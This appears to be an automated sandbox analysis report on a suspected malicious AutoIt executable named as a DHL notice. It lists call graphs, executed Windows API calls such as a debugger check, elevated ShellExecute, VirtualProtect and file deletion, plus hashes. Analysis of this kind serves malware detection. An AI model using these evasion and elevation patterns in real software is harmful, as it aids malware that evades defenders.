107138->107131 107138->107136 107138->107137 107140 c31940 __write_nolock 107139->107140 107141 c20518 GetFullPathNameW 107140->107141 107142 c2053a 107141->107142 107143 c07bcc 59 API calls 107142->107143 107144 c07165 107143->107144 107144->107116 107145 13ec1f0 107159 13e9e40 107145->107159 107147 13ec2a5 107162 13ec0e0 107147->107162 107161 13ea4cb 107159->107161 107165 13ed2d0 GetPEB 107159->107165 107161->107147 107163 13ec0e9 Sleep 107162->107163 107164 13ec0f7 107163->107164 107165->107161 107166 c3fdfc 107203 c0ab30 Mailbox _memmove 107166->107203 107169 c09c90 Mailbox 59 API calls 107169->107203 107171 c0b525 107230 c69e4a 89 API calls 4 library calls 107171->107230 107173 c40055 107229 c69e4a 89 API calls 4 library calls 107173->107229 107174 c0b475 107183 c08047 59 API calls 107174->107183 107176 c20db6 59 API calls Mailbox 107191 c09f37 Mailbox 107176->107191 107179 c40064 107180 c0b47a 107180->107173 107194 c409e5 107180->107194 107189 c0a057 107183->107189 107184 c07667 59 API calls 107184->107191 107185 c08047 59 API calls 107185->107191 107187 c56e8f 59 API calls 107187->107191 107188 c22d40 67 API calls __cinit 107188->107191 107190 c07de1 59 API calls 107190->107203 107191->107173 107191->107174 107191->107176 107191->107180 107191->107184 107191->107185 107191->107187 107191->107188 107191->107189 107192 c409d6 107191->107192 107195 c0a55a 107191->107195 107221 c0c8c0 331 API calls 2 library calls 107191->107221 107222 c0b900 60 API calls Mailbox 107191->107222 107234 c69e4a 89 API calls 4 library calls 107192->107234 107235 c69e4a 89 API calls 4 library calls 107194->107235 107233 c69e4a 89 API calls 4 library calls 107195->107233 107198 c0b2b6 107223 c0f6a3 331 API calls 107198->107223 107199 c09ea0 331 API calls 107199->107203 107201 c4086a 107202 c09c90 Mailbox 59 API calls 107201->107202 107206 c4085c 107202->107206 107203->107169 107203->107171 107203->107189 107203->107190 107203->107191 107203->107198 107203->107199 107203->107201 107204 c40878 107203->107204 107203->107206 107207 c0b21c 107203->107207 107209 c20db6 59 API calls Mailbox 107203->107209 107211 c56e8f 59 API calls 107203->107211 107215 c7df37 107203->107215 107218 c7df23 107203->107218 107224 c7c193 85 API calls 2 library calls 107203->107224 107225 c7c2e0 96 API calls Mailbox 107203->107225 107226 c67956 59 API calls Mailbox 107203->107226 107227 c7bc6b 331 API calls Mailbox 107203->107227 107228 c5617e 59 API calls Mailbox 107203->107228 107232 c69e4a 89 API calls 4 library calls 107204->107232 107206->107189 107231 c5617e 59 API calls Mailbox 107206->107231 107208 c09d3c 60 API calls 107207->107208 107210 c0b22d 107208->107210 107209->107203 107212 c09d3c 60 API calls 107210->107212 107211->107203 107212->107198 107236 c7cadd 107215->107236 107217 c7df47 107217->107203 107219 c7cadd 130 API calls 107218->107219 107220 c7df33 107219->107220 107220->107203 107221->107191 107222->107191 107223->107171 107224->107203 107225->107203 107226->107203 107227->107203 107228->107203 107229->107179 107230->107206 107231->107189 107232->107206 107233->107189 107234->107194 107235->107189 107237 c09837 84 API calls 107236->107237 107238 c7cb1a 107237->107238 107261 c7cb61 Mailbox 107238->107261 107274 c7d7a5 107238->107274 107240 c7cdb9 107241 c7cf2e 107240->107241 107246 c7cdc7 107240->107246 107312 c7d8c8 92 API calls Mailbox 107241->107312 107244 c7cf3d 107244->107246 107247 c7cf49 107244->107247 107245 c09837 84 API calls 107264 c7cbb2 Mailbox 107245->107264 107287 c7c96e 107246->107287 107247->107261 107252 c7ce00 107302 c20c08 107252->107302 107255 c7ce33 107258 c092ce 59 API calls 107255->107258 107256 c7ce1a 107308 c69e4a 89 API calls 4 library calls 107256->107308 107260 c7ce3f 107258->107260 107259 c7ce25 GetCurrentProcess TerminateProcess 107259->107255 107262 c09050 59 API calls 107260->107262 107261->107217 107263 c7ce55 107262->107263 107273 c7ce7c 107263->107273 107309 c08d40 59 API calls Mailbox 107263->107309 107264->107240 107264->107245 107264->107261 107306 c7fbce 59 API calls 2 library calls 107264->107306 107307 c7cfdf 61 API calls 2 library calls 107264->107307 107265 c7cfa4 107265->107261 107270 c7cfb8 FreeLibrary 107265->107270 107267 c7ce6b 107310 c7d649 107 API calls _free 107267->107310 107270->107261 107272 c09d3c 60 API calls 107272->107273 107273->107265 107273->107272 107311 c08d40 59 API calls Mailbox 107273->107311 107313 c7d649 107 API calls _free 107273->107313 107275 c07e4f 59 API calls 107274->107275 107276 c7d7c0 CharLowerBuffW 107275->107276 107314 c5f167 107276->107314 107280 c07667 59 API calls 107281 c7d7f9 107280->107281 107282 c0784b 59 API calls 107281->107282 107283 c7d810 107282->107283 107284 c07d2c 59 API calls 107283->107284 107285 c7d81c Mailbox 107284->107285 107286 c7d858 Mailbox 107285->107286 107321 c7cfdf 61 API calls 2 library calls 107285->107321 107286->107264 107288 c7c989 107287->107288 107292 c7c9de 107287->107292 107289 c20db6 Mailbox 59 API calls 107288->107289 107291 c7c9ab 107289->107291 107290 c20db6 Mailbox 59 API calls 107290->107291 107291->107290 107291->107292 107293 c7da50 107292->107293 107294 c7dc79 Mailbox 107293->107294 107298 c7da73 _strcat _wcscpy __wsetenvp 107293->107298 107294->107252 107295 c09b3c 59 API calls 107295->107298 107296 c09b98 59 API calls 107296->107298 107297 c09be6 59 API calls 107297->107298 107298->107294 107298->107295 107298->107296 107298->107297 107299 c09837 84 API calls 107298->107299 107300 c2571c 58 API calls __malloc_crt 107298->107300 107324 c65887 61 API calls 2 library calls 107298->107324 107299->107298 107300->107298 107304 c20c1d 107302->107304 107303 c20cb5 VirtualProtect 107305 c20c83 107303->107305 107304->107303 107304->107305 107305->107255 107305->107256 107306->107264 107307->107264 107308->107259 107309->107267 107310->107273 107311->107273 107312->107244 107313->107273 107315 c5f192 __wsetenvp 107314->107315 107316 c5f1d1 107315->107316 107319 c5f1c7 107315->107319 107320 c5f278 107315->107320 107316->107280 107316->107285 107319->107316 107322 c078c4 61 API calls 107319->107322 107320->107316 107323 c078c4 61 API calls 107320->107323 107321->107286 107322->107319 107323->107320 107324->107298

                                                                                        Executed Functions

                                                                                        Function 00C03B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C03B68
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00C03B7A
                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00CC52F8,00CC52E0,?,?), ref: 00C03BEB
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                          • Part of subcall function 00C1092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C03C14,00CC52F8,?,?,?), ref: 00C1096E
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C03C6F
                                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00CB7770,00000010), ref: 00C3D281
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00CC52F8,?,?,?), ref: 00C3D2B9
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CB4260,00CC52F8,?,?,?), ref: 00C3D33F
                                                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C3D346
                                                                                          • Part of subcall function 00C03A46: GetSysColorBrush.USER32(0000000F), ref: 00C03A50
                                                                                          • Part of subcall function 00C03A46: LoadCursorW.USER32(00000000,00007F00), ref: 00C03A5F
                                                                                          • Part of subcall function 00C03A46: LoadIconW.USER32(00000063), ref: 00C03A76
                                                                                          • Part of subcall function 00C03A46: LoadIconW.USER32(000000A4), ref: 00C03A88
                                                                                          • Part of subcall function 00C03A46: LoadIconW.USER32(000000A2), ref: 00C03A9A
                                                                                          • Part of subcall function 00C03A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C03AC0
                                                                                          • Part of subcall function 00C03A46: RegisterClassExW.USER32(?), ref: 00C03B16
                                                                                          • Part of subcall function 00C039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C03A03
                                                                                          • Part of subcall function 00C039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C03A24
                                                                                          • Part of subcall function 00C039D5: ShowWindow.USER32(00000000,?,?), ref: 00C03A38
                                                                                          • Part of subcall function 00C039D5: ShowWindow.USER32(00000000,?,?), ref: 00C03A41
                                                                                          • Part of subcall function 00C0434A: _memset.LIBCMT ref: 00C04370
                                                                                          • Part of subcall function 00C0434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C04415
                                                                                        Strings
                                                                                        • This is a third-party compiled AutoIt script., xrefs: 00C3D279
                                                                                        • runas, xrefs: 00C3D33A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                        • API String ID: 529118366-3287110873
                                                                                        • Opcode ID: 60b216d536fa48c0f8f34c8566913cb8663d0f4aac87565205877db201577a4d
                                                                                        • Instruction ID: 13f05c7f15d576e4ff4c2bf786b932219193ff4a002ad0c57f36bacd38bcb71f
                                                                                        • Opcode Fuzzy Hash: 60b216d536fa48c0f8f34c8566913cb8663d0f4aac87565205877db201577a4d
                                                                                        • Instruction Fuzzy Hash: 0751FB70E08148AEDF05EBB4DC05FED77B8AF45740F004269F412B21E1CA716B85DB21
                                                                                        Function 00C049A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 996 c049a0-c04a00 call c07667 GetVersionExW call c07bcc 1001 c04a06 996->1001 1002 c04b0b-c04b0d 996->1002 1003 c04a09-c04a0e 1001->1003 1004 c3d767-c3d773 1002->1004 1006 c04b12-c04b13 1003->1006 1007 c04a14 1003->1007 1005 c3d774-c3d778 1004->1005 1008 c3d77b-c3d787 1005->1008 1009 c3d77a 1005->1009 1010 c04a15-c04a4c call c07d2c call c07726 1006->1010 1007->1010 1008->1005 1011 c3d789-c3d78e 1008->1011 1009->1008 1019 c04a52-c04a53 1010->1019 1020 c3d864-c3d867 1010->1020 1011->1003 1013 c3d794-c3d79b 1011->1013 1013->1004 1015 c3d79d 1013->1015 1018 c3d7a2-c3d7a5 1015->1018 1021 c04a93-c04aaa GetCurrentProcess IsWow64Process 1018->1021 1022 c3d7ab-c3d7c9 1018->1022 1019->1018 1023 c04a59-c04a64 1019->1023 1024 c3d880-c3d884 1020->1024 1025 c3d869 1020->1025 1032 c04aac 1021->1032 1033 c04aaf-c04ac0 1021->1033 1022->1021 1026 c3d7cf-c3d7d5 1022->1026 1027 c3d7ea-c3d7f0 1023->1027 1028 c04a6a-c04a6c 1023->1028 1030 c3d886-c3d88f 1024->1030 1031 c3d86f-c3d878 1024->1031 1029 c3d86c 1025->1029 1036 c3d7d7-c3d7da 1026->1036 1037 c3d7df-c3d7e5 1026->1037 1040 c3d7f2-c3d7f5 1027->1040 1041 c3d7fa-c3d800 1027->1041 1038 c04a72-c04a75 1028->1038 1039 c3d805-c3d811 1028->1039 1029->1031 1030->1029 1042 c3d891-c3d894 1030->1042 1031->1024 1032->1033 1034 c04ac2-c04ad2 call c04b37 1033->1034 1035 c04b2b-c04b35 GetSystemInfo 1033->1035 1053 c04ad4-c04ae1 call c04b37 1034->1053 1054 c04b1f-c04b29 GetSystemInfo 1034->1054 1043 c04af8-c04b08 1035->1043 1036->1021 1037->1021 1047 c3d831-c3d834 1038->1047 1048 c04a7b-c04a8a 1038->1048 1044 c3d813-c3d816 1039->1044 1045 c3d81b-c3d821 1039->1045 1040->1021 1041->1021 1042->1031 1044->1021 1045->1021 1047->1021 1050 c3d83a-c3d84f 1047->1050 1051 c04a90 1048->1051 1052 c3d826-c3d82c 1048->1052 1055 c3d851-c3d854 1050->1055 1056 c3d859-c3d85f 1050->1056 1051->1021 1052->1021 1061 c04ae3-c04ae7 GetNativeSystemInfo 1053->1061 1062 c04b18-c04b1d 1053->1062 1058 c04ae9-c04aed 1054->1058 1055->1021 1056->1021 1058->1043 1060 c04aef-c04af2 FreeLibrary 1058->1060 1060->1043 1061->1058 1062->1061
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 00C049CD
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        • GetCurrentProcess.KERNEL32(?,00C8FAEC,00000000,00000000,?), ref: 00C04A9A
                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 00C04AA1
                                                                                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C04AE7
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00C04AF2
                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00C04B23
                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00C04B2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1986165174-0
                                                                                        • Opcode ID: f080de4fc1b0279e774d077cac127e79b07e589120a0b66ec4e65295a697a08d
                                                                                        • Instruction ID: 347bdbe57dd2e7b679328c68410e838a1b2abdc50f12ced2ff0adaf05da41e36
                                                                                        • Opcode Fuzzy Hash: f080de4fc1b0279e774d077cac127e79b07e589120a0b66ec4e65295a697a08d
                                                                                        • Instruction Fuzzy Hash: E291C5719897C0DECB35DB7894501ABBFF5AF2A300F4449ADD1D793A81D220BA08D76E
                                                                                        Function 00C04E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1063 c04e89-c04ea1 CreateStreamOnHGlobal 1064 c04ec1-c04ec6 1063->1064 1065 c04ea3-c04eba FindResourceExW 1063->1065 1066 c3d933-c3d942 LoadResource 1065->1066 1067 c04ec0 1065->1067 1066->1067 1068 c3d948-c3d956 SizeofResource 1066->1068 1067->1064 1068->1067 1069 c3d95c-c3d967 LockResource 1068->1069 1069->1067 1070 c3d96d-c3d975 1069->1070 1071 c3d979-c3d98b 1070->1071 1071->1067
                                                                                        APIs
                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C04D8E,?,?,00000000,00000000), ref: 00C04E99
                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C04D8E,?,?,00000000,00000000), ref: 00C04EB0
                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00C04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C04E2F), ref: 00C3D937
                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00C04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C04E2F), ref: 00C3D94C
                                                                                        • LockResource.KERNEL32(00C04D8E,?,?,00C04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C04E2F,00000000), ref: 00C3D95F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                        • String ID: SCRIPT
                                                                                        • API String ID: 3051347437-3967369404
                                                                                        • Opcode ID: ac4025338dca9bcb8470d00d1ca4765717fb7b2eca8f9e510fa648742f4ebfee
                                                                                        • Instruction ID: 2a64fc9fdd8a7ea8e6c117d253e28bad260095d87be7d6b69933b53ebdf351c2
                                                                                        • Opcode Fuzzy Hash: ac4025338dca9bcb8470d00d1ca4765717fb7b2eca8f9e510fa648742f4ebfee
                                                                                        • Instruction Fuzzy Hash: 101151B5240700BFD7258B65EC48F67BBB9FBC5711F14416CF515C6190DB61D802C664
                                                                                        Function 00C0FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID:
                                                                                        • API String ID: 3964851224-0
                                                                                        • Opcode ID: 259b7752c5924096cd5c29109959ac7115f1e50f27dbb969240e2bb59859dd73
                                                                                        • Instruction ID: 31f1b789b32c36a515579b18d7f440b626809d757efa64f4a2c70eaddd464395
                                                                                        • Opcode Fuzzy Hash: 259b7752c5924096cd5c29109959ac7115f1e50f27dbb969240e2bb59859dd73
                                                                                        • Instruction Fuzzy Hash: 44926B70508341CFD724DF14C480B6AB7E5BF89304F24896DE89A8B3A2D7B5ED85DB92
                                                                                        Function 00C6445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,00C3E398), ref: 00C6446A
                                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00C6447B
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6448B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                        • String ID:
                                                                                        • API String ID: 48322524-0
                                                                                        • Opcode ID: 2874e0777d01ed093652822d8148b69831d1e3385d89cbfc7323699b63cd3f87
                                                                                        • Instruction ID: 2f5e25d239aeb7f272455f18f85e87e2f57399b1a1f8fc57904e22e17e90b187
                                                                                        • Opcode Fuzzy Hash: 2874e0777d01ed093652822d8148b69831d1e3385d89cbfc7323699b63cd3f87
                                                                                        • Instruction Fuzzy Hash: 94E0D8324105006B42246B38EC4E6FD775C9E45335F100719F935C10E0EB7499009699
                                                                                        Function 00C0E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • Variable must be of type 'Object'., xrefs: 00C43E62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Variable must be of type 'Object'.
                                                                                        • API String ID: 0-109567571
                                                                                        • Opcode ID: aee679bb19e342bf810d27fc7d1b7c6a0c5c672efe75663c1db1f1f3c8d4713c
                                                                                        • Instruction ID: 9def9b2ccb7f709eb44fdb9169c74b6978b2aeb7db0f7d9f7bbb1c14ef86513f
                                                                                        • Opcode Fuzzy Hash: aee679bb19e342bf810d27fc7d1b7c6a0c5c672efe75663c1db1f1f3c8d4713c
                                                                                        • Instruction Fuzzy Hash: 4DA2AE74A40215CFCB24CF59C480BAEB7B1FF59314F248969E925AB391D731EE82DB90
                                                                                        Function 00C109D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C10A5B
                                                                                        • timeGetTime.WINMM ref: 00C10D16
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C10E53
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00C10E61
                                                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00C10EFA
                                                                                        • DestroyWindow.USER32 ref: 00C10F06
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C10F20
                                                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00C44E83
                                                                                        • TranslateMessage.USER32(?), ref: 00C45C60
                                                                                        • DispatchMessageW.USER32(?), ref: 00C45C6E
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C45C82
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                        • API String ID: 4212290369-3242690629
                                                                                        • Opcode ID: 241fea539447753766cd4ee01b33ddbd46e6cf1c007a25da8bf8244cb4d42eb3
                                                                                        • Instruction ID: 37b17b91e82fcd3f443228028e6e799a337050e74606f18efeab8f1a53940101
                                                                                        • Opcode Fuzzy Hash: 241fea539447753766cd4ee01b33ddbd46e6cf1c007a25da8bf8244cb4d42eb3
                                                                                        • Instruction Fuzzy Hash: 05B2A370608741DFD724DF24C885BAEB7E4BF85304F24491DF499972A2CBB1E985EB82
                                                                                        Function 00C69155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00C68F5F: __time64.LIBCMT ref: 00C68F69
                                                                                          • Part of subcall function 00C04EE5: _fseek.LIBCMT ref: 00C04EFD
                                                                                        • __wsplitpath.LIBCMT ref: 00C69234
                                                                                          • Part of subcall function 00C240FB: __wsplitpath_helper.LIBCMT ref: 00C2413B
                                                                                        • _wcscpy.LIBCMT ref: 00C69247
                                                                                        • _wcscat.LIBCMT ref: 00C6925A
                                                                                        • __wsplitpath.LIBCMT ref: 00C6927F
                                                                                        • _wcscat.LIBCMT ref: 00C69295
                                                                                        • _wcscat.LIBCMT ref: 00C692A8
                                                                                          • Part of subcall function 00C68FA5: _memmove.LIBCMT ref: 00C68FDE
                                                                                          • Part of subcall function 00C68FA5: _memmove.LIBCMT ref: 00C68FED
                                                                                        • _wcscmp.LIBCMT ref: 00C691EF
                                                                                          • Part of subcall function 00C69734: _wcscmp.LIBCMT ref: 00C69824
                                                                                          • Part of subcall function 00C69734: _wcscmp.LIBCMT ref: 00C69837
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C69452
                                                                                        • _wcsncpy.LIBCMT ref: 00C694C5
                                                                                        • DeleteFileW.KERNEL32(?,?), ref: 00C694FB
                                                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C69511
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C69522
                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C69534
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                        • String ID:
                                                                                        • API String ID: 1500180987-0
                                                                                        • Opcode ID: 5bf8b14083bbe9ee8e78da738e651bcc785cb40310fffe8b706b8987e181b5de
